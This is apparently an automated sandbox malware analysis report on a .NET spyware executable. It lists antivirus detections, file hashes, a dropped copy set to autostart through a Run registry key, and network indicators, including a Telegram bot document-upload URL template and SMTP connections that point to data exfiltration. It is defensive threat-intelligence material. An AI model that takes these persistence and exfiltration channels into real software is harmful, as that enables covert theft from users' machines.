Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
jF6LSw9bnC.exe	46%	Virustotal		Browse
jF6LSw9bnC.exe	48%	ReversingLabs	ByteCode-MSIL.Spyware.Wacatac
jF6LSw9bnC.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	46%	Virustotal		Browse
C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	48%	ReversingLabs	ByteCode-MSIL.Spyware.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.2.YYtJku.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
14.2.YYtJku.exe.5810000.1.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
3.2.jF6LSw9bnC.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
16.2.YYtJku.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
12.2.YYtJku.exe.56c0000.1.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
0.2.jF6LSw9bnC.exe.59a0000.1.unpack	100%	Avira	HEUR/AGEN.1138205	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://HsjGXz.com	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://cmY5Rn8HrJ6zxDC.com	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	jF6LSw9bnC.exe, 00000003.00000002.481145752.0000000006B80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:HTTP/1.1	jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://HsjGXz.com	YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNS	YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0	jF6LSw9bnC.exe, 00000003.00000002.481145752.0000000006B80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://us2.smtp.mailhostbox.com	jF6LSw9bnC.exe, 00000003.00000002.478242440.00000000036EA000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/	jF6LSw9bnC.exe, 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, jF6LSw9bnC.exe, 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp	false		high
https://cmY5Rn8HrJ6zxDC.com	jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, jF6LSw9bnC.exe, 00000003.00000002.478507569.0000000003712000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0A	jF6LSw9bnC.exe, 00000003.00000002.481145752.0000000006B80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x	jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	jF6LSw9bnC.exe, 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, jF6LSw9bnC.exe, 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.orgGETMozilla/5.0	YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.91.199.223	unknown	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321397
Start date:	21.11.2020
Start time:	11:48:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	jF6LSw9bnC.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9215/4@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.3% (good quality ratio 0.1%) Quality average: 23.2% Quality standard deviation: 35.3%
HCA Information:	Successful, ratio: 87% Number of executed functions: 113 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 40.88.32.150, 23.210.248.85 Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, fs.microsoft.com, blobcollector.events.data.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus16.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:49:25	API Interceptor	768x Sleep call for process: jF6LSw9bnC.exe modified
11:49:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run YYtJku C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
11:49:46	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run YYtJku C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
11:50:05	API Interceptor	881x Sleep call for process: YYtJku.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
208.91.199.223	yQDGREHA9h.exe	Get hash	malicious	Browse
	PO1.xlsx	Get hash	malicious	Browse
	Vd58qg0dhp.exe	Get hash	malicious	Browse
	Wrong Transfer Payment - Chk Clip Copy.exe	Get hash	malicious	Browse
	Doc.exe	Get hash	malicious	Browse
	SWIFT.exe	Get hash	malicious	Browse
	TNT Receipt_AWB87993766478.exe	Get hash	malicious	Browse
	BALANCE PAYMENT.exe	Get hash	malicious	Browse
	remittance advice_pdf_____________________________________.exe	Get hash	malicious	Browse
	4Pqkg8wt6j.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.461.28807.exe	Get hash	malicious	Browse
	sOZgfrw6FT.exe	Get hash	malicious	Browse
	Steel Clik PO#7770022460.exe	Get hash	malicious	Browse
	P.O. #HBG00356.doc (2).exe	Get hash	malicious	Browse
	lA1LHK759T.exe	Get hash	malicious	Browse
	bOp4cgWZkD.exe	Get hash	malicious	Browse
	5uWZrHiNrw.exe	Get hash	malicious	Browse
	LUD6Fjo15x.exe	Get hash	malicious	Browse
	Akribis Systems Pte New PO2006115.exe	Get hash	malicious	Browse
	5NFH9k6VIL.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	yQDGREHA9h.exe	Get hash	malicious	Browse	208.91.199.223
	mcsrXx9lfD.exe	Get hash	malicious	Browse	208.91.199.225
	Bill # 2.xlsx	Get hash	malicious	Browse	208.91.198.143
	PO1.xlsx	Get hash	malicious	Browse	208.91.199.223
	QKLQkaCe9M.exe	Get hash	malicious	Browse	208.91.199.224
	0hgHwEkIWY.exe	Get hash	malicious	Browse	208.91.198.143
	Swift Copy.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.199.225
	RFQ_SMKM19112020.xlsx	Get hash	malicious	Browse	208.91.199.224
	Order List.xlsx	Get hash	malicious	Browse	208.91.199.225
	Shipping doc.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	OrV86zxFWHW1j0f.exe	Get hash	malicious	Browse	208.91.199.224
	XDMBhLJxD1Qf7JW.exe	Get hash	malicious	Browse	208.91.199.224
	me4qssWAMQ.exe	Get hash	malicious	Browse	208.91.199.225
	Vd58qg0dhp.exe	Get hash	malicious	Browse	208.91.199.223
	15egpuWfT3.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details.exe	Get hash	malicious	Browse	208.91.198.143
	Wrong Transfer Payment - Chk Clip Copy.exe	Get hash	malicious	Browse	208.91.199.223
	WireTransfer Copy767.exe	Get hash	malicious	Browse	208.91.199.225
	DOH0003675550.pdf.exe	Get hash	malicious	Browse	208.91.199.224

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	yQDGREHA9h.exe	Get hash	malicious	Browse	208.91.199.223
	mcsrXx9lfD.exe	Get hash	malicious	Browse	208.91.199.225
	fattura.exe	Get hash	malicious	Browse	162.222.226.70
	Pagamento.exe	Get hash	malicious	Browse	162.222.226.70
	PO1.xlsx	Get hash	malicious	Browse	208.91.199.223
	QKLQkaCe9M.exe	Get hash	malicious	Browse	208.91.199.224
	Zahlung.exe	Get hash	malicious	Browse	162.222.226.70
	0hgHwEkIWY.exe	Get hash	malicious	Browse	208.91.198.143
	Swift Copy.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.199.225
	Zahlung.exe	Get hash	malicious	Browse	162.222.226.70
	Lieferadresse.exe	Get hash	malicious	Browse	162.222.226.70
	RFQ_SMKM19112020.xlsx	Get hash	malicious	Browse	208.91.199.224
	Order List.xlsx	Get hash	malicious	Browse	208.91.199.225
	Shipping doc.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	OrV86zxFWHW1j0f.exe	Get hash	malicious	Browse	208.91.199.224
	XDMBhLJxD1Qf7JW.exe	Get hash	malicious	Browse	208.91.199.224
	me4qssWAMQ.exe	Get hash	malicious	Browse	208.91.199.225
	Vd58qg0dhp.exe	Get hash	malicious	Browse	208.91.199.223
	15egpuWfT3.exe	Get hash	malicious	Browse	208.91.199.224

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Catalog of our new order.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYtJku.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.350410246151501
Encrypted:	false
SSDEEP:	6:Q3La/xwcE73FKDLIP12MUAvvr3tDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hg1KDLI4M9tDLI4MWuPk21v
MD5:	EE0BB4B63A030A0BF7087CB0AEBD07BC
SHA1:	9A4ADFB6336E22D49503B4B99FFC25A7882AE202
SHA-256:	6CBBAF20B7871B931A8A0B1D54890DC0E6C9ED78E7DEC5E2AB2F6D12DF349DFF
SHA-512:	47644A669A15A83D0BAA1F801BB34E36B1F8FE700E5C7A4396D684FE85AFFF6B32F511AEDD0E304DB48383E04A5044CA1B313D559737F5CD967CC00F8FDFC38B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jF6LSw9bnC.exe.log Download File
Process:	C:\Users\user\Desktop\jF6LSw9bnC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.350410246151501
Encrypted:	false
SSDEEP:	6:Q3La/xwcE73FKDLIP12MUAvvr3tDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hg1KDLI4M9tDLI4MWuPk21v
MD5:	EE0BB4B63A030A0BF7087CB0AEBD07BC
SHA1:	9A4ADFB6336E22D49503B4B99FFC25A7882AE202
SHA-256:	6CBBAF20B7871B931A8A0B1D54890DC0E6C9ED78E7DEC5E2AB2F6D12DF349DFF
SHA-512:	47644A669A15A83D0BAA1F801BB34E36B1F8FE700E5C7A4396D684FE85AFFF6B32F511AEDD0E304DB48383E04A5044CA1B313D559737F5CD967CC00F8FDFC38B
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe Download File
Process:	C:\Users\user\Desktop\jF6LSw9bnC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	618496
Entropy (8bit):	7.861639609576483
Encrypted:	false
SSDEEP:	12288:QCuRfLw9sjK8YFIxdsk9fE4ZSgexsOGnAZK0yCcxx:iREr9kFZTOlZ4CW
MD5:	020BC13012CE4DB6E204CB1ED174851E
SHA1:	46F8FF39E0D5F476B0C2E3A1C8FEEFDFEC32A0B2
SHA-256:	265E971392E878A245DEF23CC9544060FCAFBDC0C61C66CF128688F3D64E2179
SHA-512:	891367401D14B9E41FC0379FC0BDC04526E023E01F6E91C731D14C790B8B6483A11761C34B2D5A673B73ACD45761D11916E6A4A6D692C9E4955AD86F7B00B079
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 48%
Joe Sandbox View:	Filename: Catalog of our new order.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.._.................h..........N.... ........@.. ...............................T....@.....................................K.......B............................................................................ ............... ..H............text...Tg... ...h.................. ..`.rsrc...B............j..............@..@.reloc...............n..............@..B................0.......H.......`................q..pu..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....B...(.....o....&2.(....t.....(....&2.t....o....F~....~....(.........(.....(.........(....(.........(....(....o.........&...o.....(.....(.....r...p.....6..{b...(^.....o.....{a...{c....{b...oZ...(^....so....p.....oq...V.{....od....(...+...J.{....o1....ov...*J

C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\jF6LSw9bnC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.861639609576483
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	jF6LSw9bnC.exe
File size:	618496
MD5:	020bc13012ce4db6e204cb1ed174851e
SHA1:	46f8ff39e0d5f476b0c2e3a1c8feefdfec32a0b2
SHA256:	265e971392e878a245def23cc9544060fcafbdc0c61c66cf128688f3d64e2179
SHA512:	891367401d14b9e41fc0379fc0bdc04526e023e01f6e91c731d14c790b8b6483a11761c34b2d5a673b73acd45761d11916e6a4a6d692c9e4955ad86f7b00b079
SSDEEP:	12288:QCuRfLw9sjK8YFIxdsk9fE4ZSgexsOGnAZK0yCcxx:iREr9kFZTOlZ4CW
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.._.................h..........N.... ........@.. ...............................T....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x49874e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB7B03A [Fri Nov 20 12:02:02 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x98700	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9a000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x96754	0x96800	False	0.918753893272	data	7.86673164949	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x9a000	0x242	0x400	False	0.310546875	data	3.56952524932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x9a058	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 11:50:53.307959080 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:53.447977066 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:53.448226929 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.152650118 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.153371096 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.293317080 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.293366909 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.293935061 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.433954000 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.480770111 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.504533052 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.645961046 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.646023989 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.646064997 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.646094084 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.646126032 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.646131992 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.646325111 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.699486017 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.786266088 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.793934107 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:54.938110113 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:54.981004953 CET	49705	587	192.168.2.3	208.91.199.223
